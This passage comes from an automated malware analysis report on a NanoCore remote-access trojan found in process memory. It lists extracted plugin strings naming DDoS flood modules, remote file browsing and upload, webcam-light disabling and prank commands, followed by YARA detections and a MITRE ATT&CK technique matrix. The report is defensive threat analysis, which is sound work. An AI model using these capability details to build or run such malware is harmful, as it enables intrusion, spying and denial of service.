soft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691776738.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: RegSvcs.exe, 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Windows Management Instrumentation      		1
      Scheduled Task/Job      		312
      Process Injection      		11
      Disable or Modify Tools      		11
      Input Capture      		2
      File and Directory Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium12
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts13
      Exploitation for Client Execution      		Boot or Logon Initialization Scripts1
      Scheduled Task/Job      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory13
      System Information Discovery      		Remote Desktop Protocol11
      Input Capture      		Exfiltration Over Bluetooth1
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Command and Scripting Interpreter      		Logon Script (Windows)Logon Script (Windows)21
      Obfuscated Files or Information      		Security Account Manager211
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Standard Port      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job      		Logon Script (Mac)Logon Script (Mac)13
      Software Packing      		NTDS2
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Remote Access Software      		SIM Card SwapCarrier Billing Fraud
